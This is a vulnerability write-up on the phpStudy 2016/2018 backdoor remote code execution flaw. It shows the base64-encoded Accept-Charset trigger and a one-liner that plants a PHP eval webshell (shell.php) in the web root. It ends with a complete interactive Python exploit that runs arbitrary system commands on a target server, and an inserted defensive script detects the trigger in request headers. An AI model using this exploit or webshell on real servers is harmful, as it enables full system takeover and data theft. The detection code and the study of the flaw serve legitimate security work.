Vulnerability description
PHPStudyRCE (Remote Code Execution), also known as phpstudy_backdoor vulnerability, refers to a remote code execution vulnerability in PHPStudy software.
Vulnerability scope
phpStudy is a free PHP debugging environment integration package that is popular in China. It bundles Apache, PHP, MySQL, phpMyAdmin and other software so that everything is installed together in one step and can be used directly with no configuration ("one-click" setup). The 2016 and 2018 versions of phpStudy contain an RCE vulnerability that was created when the distribution was maliciously tampered with by attackers; it allows system commands to be executed remotely.
The exact impact of a vulnerability depends on how an attacker exploits the vulnerability. By exploiting this vulnerability, an attacker could execute arbitrary PHP code and take complete control of the affected system. Attackers can execute malicious code, access and modify sensitive data, plant backdoors, and more.
It should be noted that the vulnerability only affects systems running specific versions of the PHPStudy software, namely versions released between January 2018 and May 2019. The developer fixed the vulnerability in the corrected version released in May 2019.
| Item | Content |
|---|---|
| Vulnerability number | phpstudy-2016,2018-RCE |
| Vulnerability name | RCE (Remote Command/Code Execution) |
| Vulnerability rating | High risk |
| Scope of impact | phpStudy 2016 to phpStudy 2018 |
| Vulnerability description | Attackers can exploit this vulnerability to execute PHP commands; also known as the phpStudy backdoor. |
Vulnerability environment
Link: https://pan.baidu.com/s/1_kieJmU7Azq-lMKIp9VmaA
Extraction code: 2hf6
Vulnerability reproduction
The specific version and server platform are not listed here; refer to the phpinfo output for them.
Use Burp to capture the request and then resend it.
exploit
Triggering conditions
Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
Accept-Encoding: gzip,deflate
Tip: pay attention to the spaces here.
Use the Burp encoder to build a system() call and base64-encode it,
which gives
c3lzdGVtKCdpcGNvbmZpZycpOw==
After modifying the request, replay it; the response source on the right shows that ipconfig has been executed.
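A defender-side check for the trigger described above, added here as an example that is not part of the original write-up: it base64-decodes the Accept-Charset header of constructed sample requests and flags values that decode to PHP source, using the Accept-Encoding value from the trigger conditions as a secondary signal. A real Accept-Charset is a list of charset names and q-values and never decodes as base64 text, so a decodable value is suspicious on its own.

```python
import base64
import binascii

# Constructed sample request headers (not real traffic): a normal browser
# request, a request carrying the trigger shown in this write-up, and a
# request whose header is base64 but decodes to plain text, not PHP.
SAMPLE_REQUESTS = [
    {"Accept-Charset": "utf-8, iso-8859-1;q=0.5", "Accept-Encoding": "gzip, deflate, br"},
    {"Accept-Charset": "c3lzdGVtKCdpcGNvbmZpZycpOw==", "Accept-Encoding": "gzip,deflate"},
    {"Accept-Charset": "aGVsbG8gd29ybGQ=", "Accept-Encoding": "gzip,deflate"},
]

# Fragments that show the decoded value is PHP code rather than a charset list.
PHP_MARKERS = ("<?php", "system(", "eval(", "shell_exec(", "passthru(", "exec(", "assert(")


def decode_if_base64(value):
    """Return the decoded text if value is strict base64 of UTF-8 text, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def classify(headers):
    """Return 'malicious', 'suspicious' or 'benign' for one request's headers."""
    decoded = decode_if_base64(headers.get("Accept-Charset", "").strip())
    if decoded is None:
        return "benign"          # ordinary charset list, not base64 text
    if any(marker in decoded for marker in PHP_MARKERS):
        return "malicious"       # decoded header is PHP source: the backdoor trigger
    # Base64 text in Accept-Charset is abnormal even without PHP markers; the
    # exact "gzip,deflate" encoding value from the trigger conditions adds weight.
    if headers.get("Accept-Encoding", "").strip() == "gzip,deflate":
        return "suspicious"
    return "suspicious"


def scan(requests):
    """Classify every request; returns a list of (index, verdict) for non-benign ones."""
    return [(i, classify(h)) for i, h in enumerate(requests) if classify(h) != "benign"]


if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict}")
```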
exploit
The function of this code is to write the string `<?php @eval($_POST[cmd]); ?>` to the file "C:/phpStudy/WWW/shell.php". That PHP code executes whatever command arrives in the $_POST[cmd] variable and returns the result. This is a common one-liner used to write webshells; note that such code is very dangerous because it allows arbitrary command execution and manipulation of the server filesystem, and it can easily be misused, for example to execute malicious commands or to destroy or steal data.
system(' echo ^<?php@eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/shell.php ');
POC
POC is the abbreviation of "Proof of Concept". In computer security, a POC usually refers to a specific demonstration or proof code written by attackers or security researchers to verify that a vulnerability exists, how it can be used, or how it is attacked.
Next, I will show it to you. To better show the effect, I will demonstrate it in PowerShell.
When I run this RCE script, the interface below is displayed and the tool's usage is printed.
When I add the website and run the script, I am prompted to enter the command I want to execute; pressing Enter executes it on the remote phpStudy server host.
Below is the source code

```python
import requests
import base64
import sys

banner = '''
.---. .-. .--. .-. .-. .---. .--. .--.
: .; :: : : .--'.' `. : : : .; :: .--': .--'
: _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-. : .': : : `;
: : : .. :: .; ` _`, : : : : :; :' .; :: :; : : :.`.: :__ : :__
:_; :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ; :_;:_;`.__.'`.__.'
: : .-. :
:_; `._.'
python *.py http://192.168.21.155/phpinfo.php
'''

# Usage: python <script>.py <url>; print the banner and stop if no URL is given.
if len(sys.argv) < 2:
    print(banner)
    exit()

url = sys.argv[1]


def attack(cmd):
    # Wrap the command in a PHP system() call and base64-encode it; this is the
    # value sent in the Accept-Charset header, as shown in the trigger conditions.
    cmd = f"system('{cmd}');"
    cmd = base64.b64encode(cmd.encode())
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept-Charset": cmd,
        "Accept-Encoding": "gzip,deflate"
    }
    res = requests.get(url=url, headers=headers)
    # phpStudy responses are GB2312-encoded; the command output precedes the page HTML,
    # so everything before "DOCTYPE html" is the command result.
    rs = res.content.decode("gb2312")
    result = rs[0:rs.find("DOCTYPE html")]
    return result


if __name__ == '__main__':
    cmd = input("请输入想要执行的系统命令:")  # prompt: enter the system command to execute
    if cmd == 'q':
        print("感谢使用!!!")  # "Thanks for using!!!"
    else:
        print(attack(cmd))
```